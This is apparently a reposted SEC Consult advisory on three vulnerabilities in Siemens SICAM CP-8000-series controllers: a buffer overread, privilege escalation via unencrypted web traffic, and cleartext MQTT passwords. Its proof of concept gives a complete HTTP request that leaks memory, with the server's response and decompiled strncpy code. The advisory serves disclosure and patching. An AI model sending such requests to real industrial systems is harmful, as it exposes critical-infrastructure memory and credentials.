Summary: This content discusses a vulnerability in a vendor’s product and provides a business recommendation for addressing the issue.
Threat Actor: N/A
Victim: N/A
Key Point :
- The vendor, Siemens, is a technology company focused on industry, infrastructure, transport, and healthcare.
- SEC Consult recommends installing a patch provided by the vendor and conducting a thorough security review of the product.
- The vulnerability described is a buffer overread vulnerability in the webserver running on certain models of Siemens products.
Vendor description
“We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers.“
Source: https://new.siemens.com/global/en/company/about.html
Business recommendation
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.
Vulnerability overview/description
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread vulnerability.
The value of the HTTP header “Session-ID” is processed and used in a “strncpy” call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)
An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords and might gain access to their accounts to perform tasks with elevated privileges.
3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)
A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device.
Proof of concept
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The buffer overread can be triggered by sending a “Session-ID” in the HTTP request header with exactly 20 bytes. This can be done with e.g. this request:
POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9921c6cAAAA
Sequence-ID: 1
Content-Length: 8
Content-Type: text/plain
KeepAlive: 5
Connection: close
type=3The server answers with following response:
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA9921c6cAAAAæk¤
Cache-Control: max-age=0, private
X-Frame-Options: sameorigin
Strict-Transport-Security: max-age=31536000; includeSubdomains
Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval'
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Length: 71
Connection: close
Date: Wed, 30 Mar 2022 01:38:37 GMT
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8
type=4The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body.
The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):
ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID);
if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;
if ( is_a_session_available == 0 ) {
strncpy(&session_id, ptr_fcgi_header, 0x14);
}strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we are sending exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a Null-pointer.
libc‘s documentation even contains a warning for this case: “If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated.“
Thus, if the response is built, every data structure in BSS following the session_id global will be printed as string until a Null byte is encountered.
“An interesting youtube video that may be related to the article above”